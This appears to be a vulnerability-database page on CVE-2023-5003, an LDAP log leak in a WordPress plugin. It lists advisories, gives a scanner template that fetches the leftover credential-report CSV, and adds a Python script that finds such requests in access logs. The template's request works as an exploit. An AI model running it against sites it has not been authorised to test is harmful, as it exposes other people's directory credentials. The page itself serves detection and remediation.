| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2023-5003 | 17 Oct 2023 00:38 | – | circl |
| WordPress plugin Active Directory Integration / LDAP Integration security vulnerability | 16 Oct 2023 00:00 | – | cnnvd |
| CVE-2023-5003 | 16 Oct 2023 19:39 | – | cve |
| CVE-2023-5003 Active Directory Integration < 4.1.10 - Unauthenticated Log Disclosure | 16 Oct 2023 19:39 | – | cvelist |
| CVE-2023-5003 | 16 Oct 2023 20:15 | – | nvd |
| owasp-modsecurity-crs-4.10.0-1.1 on GA media (moderate) | 31 Jan 2025 00:00 | – | opensuse |
| CVE-2023-5003 | 16 Oct 2023 20:15 | – | osv |
| OPENSUSE-SU-2025:14717-1 owasp-modsecurity-crs-4.10.0-1.1 on GA media | 30 Jan 2025 00:00 | – | osv |
| WordPress Active Directory Integration / LDAP Integration Plugin < 4.1.10 is vulnerable to Sensitive Data Exposure | 17 Oct 2023 00:00 | – | patchstack |
| Design/Logic Flaw | 16 Oct 2023 20:15 | – | prion |

```yaml
id: CVE-2023-5003

info:
  name: Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure
  author: s4e-io
  severity: high
  description: |
    The Active Directory Integration / LDAP Integration WordPress plugin before 4.1.10 stores sensitive LDAP logs in a buffer file when an administrator wants to export said logs. Unfortunately, this log file is never removed, and remains accessible to any users knowing the URL to do so.
  impact: |
    Unauthenticated attackers can access sensitive LDAP logs containing authentication credentials and directory information by directly accessing the buffer file URL.
  remediation: Fixed in 4.1.10
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-5003
    - https://wpscan.com/vulnerability/91f4e500-71f3-4ef6-9cc7-24a7c12a5748/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-5003
    epss-score: 0.25855
    epss-percentile: 0.97719
    cpe: cpe:2.3:a:miniorange:active_directory_integration_\/_ldap_integration:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: miniorange
    product: active_directory_integration_\/_ldap_integration
    framework: wordpress
  tags: wpscan,exposure,csv,ldap,wordpress,wp-plugin,cve,cve2023,miniorange,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/ldap-authentication-report.csv"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "ID"
          - "USERNAME"
          - "TIME"
          - "LDAP STATUS"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022058cbb3fe536659929ff6791a8b20acbdf39eb8d31a4a2af258cbc8789b12553e022100f78fcec0886617b3a0a7228b153ebdcf683ab8cc629b5094e6dee058bc617413:922c64590222798bb761d5b6d8e72950
```
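
To find out whether the leftover report file was already requested on a site, the path from the template can be searched for in the web server's access logs. The following is an added example, not part of the template or the plugin; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path taken from the template above; log format and names are assumptions.
REPORT_PATH = "/wp-content/ldap-authentication-report.csv"

# Apache/nginx "combined" access log layout (assumed).
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Oct/2023:01:12:09 +0000] "GET /wp-content/ldap-authentication-report.csv HTTP/1.1" 200 4812 "-" "curl/8.1"',
    '198.51.100.23 - - [17/Oct/2023:02:40:51 +0000] "GET /blog//wp-content/ldap-authentication-report%2Ecsv?x=1 HTTP/1.1" 404 153 "-" "-"',
    '192.0.2.10 - - [17/Oct/2023:03:00:00 +0000] "GET /wp-content/uploads/logo.png HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

def normalise(target):
    """Drop the query string, decode %XX and collapse repeated slashes."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def find_report_requests(lines):
    """Return one finding per request for the leftover LDAP report file."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        # endswith() also covers WordPress installed in a subdirectory.
        if not m or not normalise(m["target"]).endswith(REPORT_PATH):
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        findings.append({
            "ip": m["ip"], "time": m["ts"], "status": status, "bytes": size,
            # 200/206 with a body: the file existed and was served.
            "disclosed": status in (200, 206) and size > 0,
        })
    return findings

if __name__ == "__main__":
    for f in find_report_requests(SAMPLE_LOG):
        print(f)
```

A finding with `disclosed` set means the report was served to that client, so the LDAP log contents described in the template's impact field should be treated as exposed.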